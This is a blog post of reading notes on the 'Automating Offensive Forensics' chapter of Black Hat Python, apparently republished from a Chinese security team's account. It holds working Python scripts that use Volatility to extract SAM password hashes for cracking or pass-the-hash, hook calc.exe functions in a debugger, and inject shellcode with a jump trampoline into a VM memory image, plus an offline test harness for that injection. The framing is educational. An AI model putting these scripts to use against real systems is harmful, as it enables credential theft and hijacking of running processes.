Automating Offensive Forensics

admin · 2025-01-12 00:27:04 · 6 views · 4,666 characters · 15 min 33 s read


Preface

These are reading notes on Black Hat Python: Python Programming for Hackers and Pentesters. They include the book's source code, some of which I have rewritten for Python 3. The book is fairly old by now, but it is still a very good one.

This post covers chapter 11, Automating Offensive Forensics, which is mainly about driving Volatility from Python.

1. Volatility setup

Install it from code.google.com/p/volatility/downloads/list (Google Code has since shut down; the Volatility 2.x releases the book uses are now hosted at https://github.com/volatilityfoundation/volatility, and they require Python 2.7).

Run python vol.py imageinfo -f "memorydump.img" to identify the profile of the target image.

The most important piece of information is:

[Image: imageinfo output; the line that matters is the suggested profile, which is passed as --profile below]

Then run python vol.py plugin --profile="WinXPSP2x86" arguments, substituting the plugin name and its arguments.

2. Dumping password hashes

Dumped password hashes can be cracked offline, or used directly for authentication by impersonation (pass-the-hash).

  • Run Volatility's hivelist plugin to locate the in-memory offsets of the SAM and SYSTEM registry hives: python vol.py hivelist --profile=WinXPSP2x86 -f "WindowsXPSP2.vmem"

  • Once you have the virtual addresses (offsets) of the hives, dump the hashes: python vol.py hashdump -d --profile=WinXPSP2x86 -f "WindowsXPSP2.vmem" -y <system offset> -s <SAM offset>

Turned into a script (Python 2.7, because Volatility 2.3 does not run on Python 3):

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2.7 script: Volatility 2.3 is Python 2 only.
from __future__ import print_function

import sys

# Location of the memory image to analyse
memory_file = r"D:\Windows XP Professional-f6b49762.vmem"

# Path where the Volatility download was unpacked
sys.path.append(r"D:\volatility-2.3")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

config.parse_options()
config.PROFILE = "WinXPSP3x86"          # the profile imageinfo suggested
config.LOCATION = "file://%s" % memory_file

# Register the global options (profile, location, ...)
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)

from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump

# RegistryApi bundles the common registry helpers. Don't call it 'registry':
# that name is already the volatility.registry module imported above.
reg_api = RegistryApi(config)
# Same work as the hivelist command: fills reg_api.all_offsets (offset -> hive path)
reg_api.populate_offsets()

sam_offset = None
sys_offset = None

# Walk the hives looking for the SAM and system hives
for offset in reg_api.all_offsets:
    hive_name = reg_api.all_offsets[offset]
    if hive_name.endswith(r"\SAM"):
        sam_offset = offset
        print("[*] SAM: 0x%08x" % offset)
    if hive_name.endswith(r"\system"):
        sys_offset = offset
        print("[*] System: 0x%08x" % offset)
    if sam_offset is not None and sys_offset is not None:
        config.sys_offset = sys_offset
        config.sam_offset = sam_offset
        # Equivalent to: hashdump -y <system offset> -s <SAM offset>
        hashdump = HashDump(config)
        for h in hashdump.calculate():
            print(h)
        break

if sam_offset is None or sys_offset is None:
    print("[*] Failed to find the system or SAM offsets.")
```

3. Direct code injection

Using Calculator (calc.exe) as the example. Before patching anything we need a function to hijack. The Immunity Debugger script below sets a logging breakpoint on every function in calc.exe and removes each one after its first hit; press the key you are interested in (here the "=" button) while it runs, and the address logged for that key press is the function used as equals_button in the next section.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# PyCommand for Immunity Debugger (Python 2.7). Place it in the PyCommands
# directory and run it from the command bar after attaching to calc.exe.
from immlib import *


class cc_hook(LogBpHook):
    """Logs a function's address the first time it is called, then removes
    the breakpoint so each function is reported only once."""

    def __init__(self):
        LogBpHook.__init__(self)
        self.imm = Debugger()

    def run(self, regs):
        self.imm.log("%08x" % regs['EIP'], regs['EIP'])
        self.imm.deleteBreakpoint(regs['EIP'])
        return


def main(args):
    imm = Debugger()

    calc = imm.getModule("calc.exe")
    imm.analyseCode(calc.getCodebase())
    functions = imm.getAllFunctions(calc.getCodebase())

    # One logging breakpoint at the entry of every function in calc.exe
    hooker = cc_hook()
    for function in functions:
        hooker.add("%08x" % function, function)

    return "Tracking %d functions." % len(functions)
```

4. Inserting the shellcode

The final script. It walks the pages of calc.exe in the memory image, finds a run of null bytes large enough to hold the shellcode and writes it there, then overwrites the start of the target function (equals_button) with a seven-byte trampoline (mov ebx, shellcode; jmp ebx). The image is modified in place, so work on a copy:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2.7 script (Volatility 2.3). Writes into the memory image in place.
from __future__ import print_function

import sys
import struct

# Virtual address of the function to hijack (found with the Immunity Debugger script)
equals_button = 0x01005D51

# Location of the memory image to analyse
memory_file = r"D:\Windows XP Professional-f6b49762.vmem"

slack_space = None        # virtual address chosen for the shellcode
trampoline_offset = None  # physical (file) offset of equals_button
tramp = None              # encoded trampoline bytes

# Read in our shellcode
with open("cmeasure.bin", "rb") as sc_fd:
    sc = sc_fd.read()

sys.path.append(r"D:\volatility-2.3")

import volatility.conf as conf
import volatility.registry as registry

registry.PluginImporter()
config = conf.ConfObject()

import volatility.commands as commands
import volatility.addrspace as addrspace

registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
config.parse_options()
config.PROFILE = "WinXPSP3x86"
config.LOCATION = "file://%s" % memory_file

import volatility.plugins.taskmods as taskmods

p = taskmods.PSList(config)

for process in p.calculate():
    if str(process.ImageFileName) != "calc.exe":
        continue

    print("[*] Found calc.exe with PID %d" % process.UniqueProcessId)
    print("[*] Hunting for physical offsets...please wait.")

    address_space = process.get_process_address_space()
    pages = address_space.get_available_pages()

    # page[0]: page virtual address, page[1]: page size
    for page in pages:
        physical = address_space.vtop(page[0])
        if physical is None:
            continue

        # Look for a run of null bytes big enough for the shellcode (only until found)
        if slack_space is None:
            fd = open(memory_file, "r+b")   # binary mode: no newline translation on Windows
            fd.seek(physical)
            buf = fd.read(page[1])
            try:
                offset = buf.index("\x00" * len(sc))
            except ValueError:
                offset = None
            if offset is not None:
                slack_space = page[0] + offset
                print("[*] Found good shellcode location!")
                print("[*] Virtual address: 0x%08x" % slack_space)
                print("[*] Physical address: 0x%08x" % (physical + offset))
                print("[*] Injecting shellcode.")
                fd.seek(physical + offset)
                fd.write(sc)
                fd.flush()
                # Build our trampoline; the assembly is:
                #   mov ebx, ADDRESS_OF_SHELLCODE
                #   jmp ebx
                tramp = "\xbb%s" % struct.pack("<L", slack_space)
                tramp += "\xff\xe3"
            fd.close()
            if slack_space is not None and trampoline_offset is not None:
                break

        # Is the target function in this page, with room for the 7-byte trampoline?
        if page[0] <= equals_button and equals_button < (page[0] + page[1] - 7):
            print("[*] Found our trampoline target page at: 0x%08x" % physical)
            v_offset = equals_button - page[0]        # offset inside the page
            trampoline_offset = physical + v_offset   # physical (file) offset
            print("[*] Found our trampoline target at: 0x%08x" % trampoline_offset)
            if slack_space is not None:
                break

    if slack_space is None or trampoline_offset is None:
        print("[*] Could not find both a shellcode location and the trampoline target.")
        sys.exit(1)

    print("[*] Writing trampoline...")
    fd = open(memory_file, "r+b")
    fd.seek(trampoline_offset)
    fd.write(tramp)
    fd.close()
    print("[*] Done injecting code.")
    break
```
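The script above can only be exercised against a real VMware snapshot with Volatility installed. As an added example (my code, not the book's or this post's), here is the same injection logic run against a constructed fake memory image so the page-walk, slack search, trampoline encoding and page-boundary check can be tested offline. A plain list of (virtual address, size, physical offset) tuples stands in for get_available_pages() plus vtop(); the three-page image, its addresses and the nop-sled stand-in for cmeasure.bin are all constructed for the example.

```python
import struct

PAGE = 0x1000
TRAMPOLINE_LEN = 7   # mov ebx, imm32 (5 bytes) + jmp ebx (2 bytes)

# Constructed stand-in for cmeasure.bin: a nop sled ending in int3, not real shellcode
SHELLCODE = b"\x90" * 8 + b"\xcc"


def build_trampoline(shellcode_va):
    """x86 'mov ebx, shellcode_va ; jmp ebx' (BB imm32 ; FF E3)."""
    return b"\xbb" + struct.pack("<L", shellcode_va) + b"\xff\xe3"


def decode_trampoline(blob):
    """Jump target encoded by build_trampoline, or None if the bytes don't match."""
    if len(blob) != TRAMPOLINE_LEN or blob[0] != 0xBB or blob[5:] != b"\xff\xe3":
        return None
    return struct.unpack("<L", blob[1:5])[0]


def find_slack(image, pages, size):
    """First run of `size` null bytes inside a mapped page.
    Returns (virtual_address, physical_offset) or None."""
    for va, psize, phys in pages:
        idx = image[phys:phys + psize].find(b"\x00" * size)
        if idx != -1:
            return va + idx, phys + idx
    return None


def locate_target(pages, target_va):
    """Physical offset of target_va, but only if the whole trampoline fits inside
    that page (the original script uses the slightly stricter target < page_end - 7)."""
    for va, psize, phys in pages:
        if va <= target_va and target_va + TRAMPOLINE_LEN <= va + psize:
            return phys + (target_va - va)
    return None


def inject(image, pages, shellcode, target_va):
    """Write shellcode into null slack and hijack target_va with a trampoline.
    Mutates `image` (a bytearray) the way the script writes the .vmem in place.
    Returns the chosen addresses, or None when either location is missing."""
    slack = find_slack(image, pages, len(shellcode))
    target_phys = locate_target(pages, target_va)
    if slack is None or target_phys is None:
        return None
    sc_va, sc_phys = slack
    image[sc_phys:sc_phys + len(shellcode)] = shellcode
    image[target_phys:target_phys + TRAMPOLINE_LEN] = build_trampoline(sc_va)
    return {"shellcode_va": sc_va, "shellcode_phys": sc_phys, "target_phys": target_phys}


def make_fake_image():
    """Constructed three-page image: page 0 is 'code' (0xCC filler), page 1 is data
    with a 64-byte null hole at +0x100, page 2 is fully used. Virtual 0x01005000
    maps to file offset 0, 0x01006000 to 0x1000, 0x01007000 to 0x2000."""
    image = bytearray(b"\xcc" * (3 * PAGE))
    image[PAGE + 0x100:PAGE + 0x140] = b"\x00" * 0x40
    pages = [(0x01005000, PAGE, 0), (0x01006000, PAGE, PAGE), (0x01007000, PAGE, 2 * PAGE)]
    return image, pages


if __name__ == "__main__":
    img, pg = make_fake_image()
    result = inject(img, pg, SHELLCODE, 0x01005D51)
    print(result)
    print("trampoline jumps to 0x%08x" % decode_trampoline(bytes(img[0xD51:0xD58])))
```

The boundary check in locate_target is the part worth keeping in mind: get_available_pages() hands back pages one at a time, and the seven trampoline bytes have to be written to one physical page, otherwise the second half lands at whatever file offset follows, which is generally not the next virtual page.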

Closing remarks

I'll go back and take a closer look at Volatility itself.

红客突击队 (Red Hacker Strike Team) was founded in 2019, led by captain k龙 together with graduate students from several top domestic universities. Since then the team has taken part in international cyber-security competitions many times with good results and has built up considerable competition experience. It currently has more than thirty full members plus a number of reserve members, with several affiliated sub-teams. The team holds to the principle of character first, technology second, and aims to become a world-class cyber-security team.

Originally published on the WeChat public account 红客突击队: 自动化攻击取证

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching only. Readers who put this information to other uses bear full legal and joint liability; this site assumes no legal or joint liability. Questions can be sent by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
  • Reprints should keep this link (CN-SEC 中文网; thanks to the original author for their work): 自动化攻击取证 https://cn-sec.com/archives/1114623.html